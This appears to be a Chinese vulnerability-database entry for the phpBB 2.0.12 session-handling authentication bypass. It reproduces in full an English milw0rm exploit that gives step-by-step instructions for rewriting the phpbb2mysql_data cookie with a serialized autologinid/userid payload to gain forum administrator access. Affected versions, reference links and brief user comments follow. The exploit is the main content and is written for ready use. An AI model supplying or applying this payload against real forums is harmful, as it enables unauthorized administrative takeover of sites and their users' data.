|漏洞详情
phpBB2.0.12及更早版本中的sessions.php使得远程攻击者可以通过一个在cookie中的autologinid值来获取管理员权限。
|漏洞EXP
phpBB 2.0.12 Session Handling Authentication Bypass ..
easy to use exploit ..
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:Documents and SettingsALIApplication DataMozillaFirefoxProfilesur4nn6o5.default" when using WinXP)) in example ;)
and you will find something like :
---------------------------------------------------------------------------------------------------------------\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
complete the mission by clicking " Go to Administration Panel "
--------------------------------------------------------------------------------
written by : Ali7
e-mail : [email protected]
# milw0rm.com [2005-03-11]
|受影响的产品
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB
|参考资料
来源:www.phpbb.com
链接:http://www.phpbb.com/phpBB/viewtopic.php?t=267563
来源:SECUNIA
名称:14413
链接:http://secunia.com/advisories/14413
来源:BUGTRAQ
名称:20050304phpBB2.0.12SessionHandlingAdministratorAuthenticationBypass
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110999268130739&w;=2
来源:BUGTRAQ
名称:20050301phpBB<=2.0.12UIDExploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110970201920206&w;=2
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666